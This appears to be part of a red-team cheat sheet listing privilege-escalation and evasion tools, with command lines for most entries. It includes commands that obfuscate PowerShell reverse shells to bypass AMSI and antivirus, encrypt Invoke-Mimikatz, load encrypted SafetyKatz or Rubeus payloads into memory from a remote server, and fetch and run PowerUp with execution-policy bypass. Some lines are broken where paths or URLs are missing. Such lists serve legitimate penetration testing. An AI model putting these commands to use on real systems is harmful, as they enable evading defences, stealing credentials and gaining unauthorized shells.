Privilege Escalation

CrossC2: generate CobaltStrike's cross-platform payload.

/genCrossC2.Linux 4444 .cobaltstrike.beacon_keys null Linux x86 ./cross

TheFatRat: TheFatRat is an exploitation tool that compiles malware with well-known payloads; the compiled malware can then be executed on Linux, Windows, Mac and Android. TheFatRat provides an easy way to create backdoors and payloads that can bypass most anti-virus products.

traitor: Automatic Linux privesc via exploitation of low-hanging fruit, e.g. GTFOBins.


DKMC: Don't kill my cat is a tool that generates obfuscated shellcode that is stored inside of polyglot images. The image is 100% valid and also 100% valid shellcode. The idea is to avoid sandbox analysis since it's a simple "legit" image. For now the tool relies on PowerShell to execute the final shellcode payload.

darkarmour: Store and execute an encrypted windows binary from inside memory, without a single bit touching disk.

./ -f bins/meter.exe --encrypt xor --jmp -o bins/legit.exe --loop 5

donut: Donut is a position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files and dotNET assemblies.

chimera: Chimera is a (shiny and very hack-ish) PowerShell obfuscation script designed to bypass AMSI and antivirus solutions. It digests malicious PS1's known to trigger AV and uses string substitution and variable concatenation to evade common detection signatures.

./ -f shells/Invoke-PowerShellTcp.ps1 -o /tmp/chimera.ps1 -g -v -t -j -i -c -h -s -b -e
# "cmd.exe" isn't a data type but when wrapped in double-quotes, this works
./ -f shells/generic1.ps1 -l 2 -o /tmp/chimera.ps1 -v -t cmd.exe -c /tmp/harry_potter.txt -i -h -s getstream -b new-object -j -g -k -r -p
./ -f shells/generic2.ps1 -l 1 -o /tmp/chimera.ps1 -v -t -c -i -h -s excePTIon.InneRexcePTIon.message,getstream -b invoke-expression,new-object -j -g -k -r -p
./ -f shells/generic3.ps1 -l 1 -o /tmp/chimera.ps1 -v -t -c -i -h -s equals,split,getstream -b new-object -j -g -k -r -p
# short strings like `-s pwd` are prone to breaking scripts
./ -f shells/powershell_reverse_shell.ps1 -l 2 -o /tmp/chimera.ps1 -v -t -c -i -h -s getstream,close,pwd,ascii,write -b iex,out-string,new-object -j -g -k -r -p
# nishang scripts
./ -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,invoke-expression,out-string,write-error -j -g -k -r -p
./ -f shells/Invoke-PowerShellTcpOneLine.ps1 -l 2 -o /tmp/chimera.ps1 -v -t -c -i -h -s getstream,read -b while,new-object,iex -j -g -k -r -p

Invoke-Stealth: This tool helps you to automate the obfuscation process of any script written in PowerShell with different techniques.

BetterXencrypt: A better version of Xencrypt. Xencrypt itself is a PowerShell runtime crypter designed to evade AVs.

Import-Module ./betterxencrypt.ps1
Invoke-BetterXencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1

Invoke-SharpLoader: Load encrypted and compressed C# code from a remote web server or from a local file straight into memory and execute it there.

Encrypt C# file:
Invoke-SharpEncrypt -file C:\CSharpFiles\SafetyKatz.exe -password S3cur3Th1sSh1t -outfile C:\CSharpEncrypted\SafetyKatz.enc
Only full paths to the file are accepted at this point. The encrypted files generated by Invoke-SharpEncrypt can then be hosted on a web server on the Internet or stored on disk on the target system. Invoke-SharpLoader can be used to decrypt and execute the files in memory. Two examples demonstrate how to load a file from a remote web server or from disk.
Load from URL:
Invoke-SharpLoader -location -password S3cur3Th1sSh1t -noArgs
Load from DISK:
Invoke-SharpLoader -location C:\EncryptedCSharp\Rubeus.enc -password S3cur3Th1sSh1t -argument kerberoast -argument2 "/format:hashcat"

PEASS: Privilege Escalation Awesome Scripts SUITE.

deepce: Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE).

unicorn: Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

python harmless.ps1
python myfile.ps1 macro
python muahahaha.ps1 macro 500

ScareCrow: Payload creation framework designed around EDR bypass.


PowerSploit: PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.

powershell Invoke-WebRequest -OutFile PowerUp.ps1
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

Powerless: Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind.

Watson: Enumerate missing KBs and suggest exploits for useful Privilege Escalation vulnerabilities.

C:\> Watson.exe
[*] OS Build Number: 14393
[*] Enumerating installed KBs...
[!] CVE-2019-0836 : VULNERABLE
[!] CVE-2019-0841 : VULNERABLE
[!] CVE-2019-1064 : VULNERABLE
[!] CVE-2019-1130 : VULNERABLE

Sherlock: PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.

JAWS: JAWS is a PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. It is written using PowerShell 2.0 so 'should' run on every Windows version since Windows 7.

AccessChk: Find misconfigured services.

accesschk.exe /accepteula
accesschk "power users" c:\windows\system32
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*

MineSweeper: Windows user-land hooks manipulation tool.

pe-sieve: Scans a given process. Recognizes and dumps a variety of potentially malicious implants (replaced/injected PEs, shellcodes, hooks, in-memory patches).

hollows_hunter: Scans all running processes. Recognizes and dumps a variety of potentially malicious implants (replaced/implanted PEs, shellcodes, hooks, in-memory patches).

Linux

GTFOBins: GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.

LinEnum: Linux sh script for privesc.

/ -s -k keyword -r report -e /tmp/ -t

pspy: unprivileged Linux process snooping.